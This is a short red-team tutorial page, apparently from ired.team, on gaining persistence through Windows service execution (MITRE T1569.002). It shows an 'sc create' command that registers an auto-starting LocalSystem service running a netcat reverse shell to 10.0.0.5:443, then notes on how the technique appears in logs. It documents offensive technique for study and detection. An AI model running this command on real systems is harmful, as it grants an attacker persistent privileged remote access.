Red Teaming Experiments
linkedin
github
@spotheplanet
patreon
Search…
What is ired.team?
Pinned
Pentesting Cheatsheets
Active Directory & Kerberos Abuse
offensive security
Red Team Infrastructure
Initial Access
Code Execution
Code & Process Injection
Defense Evasion
Enumeration and Discovery
Privilege Escalation
Credential Access & Dumping
Lateral Movement
Persistence
DLL Proxying for Persistence
Schtask
Service Execution
Sticky Keys
Create Account
AddMonitor()
NetSh Helper DLL
Abusing Windows Managent Instrumentation
Windows Logon Helper
Hijacking Default File Extension
Persisting in svchost.exe with a Service DLL
Modifying .lnk Shortcuts
Screensaver Hijack
Application Shimming
BITS Jobs
COM Hijacking
SIP & Trust Provider Hijacking
Hijacking Time Providers
Installing Root Certificate
Powershell Profile Persistence
RID Hijacking
Word Library Add-Ins
Office Templates
Exfiltration
reversing, forensics & misc
Internals
Cloud
Neo4j
Dump Virtual Box Memory
AES Encryption Using Crypto++ .lib in Visual Studio C++
Reversing Password Checking Routine
Powered By
GitBook
Service Execution
Code Execution, Privilege Escalation
Execution
Creating an evil service with a netcat reverse shell:
[email protected]
1
C
:
\
>
sc create
evilsvc
binpath
=
"c:\tools\nc 10.0.0.5 443 -e cmd.exe"
start
=
"auto"
obj
=
"LocalSystem"
password
=
""
2
[
SC
]
CreateService
SUCCESS
3
C
:
\
>
sc start evilsvc
Copied!
Observations
The reverse shell lives under services.exe as expected:
Windows security, application, Service Control Manager and sysmon logs provide some juicy details:
References
System Services: Service Execution, Sub-technique T1569.002 - Enterprise | MITRE ATT&CK®
Previous
Schtask
Next
Sticky Keys
Last modified
3yr ago
Copy link
Contents
Execution
Observations
References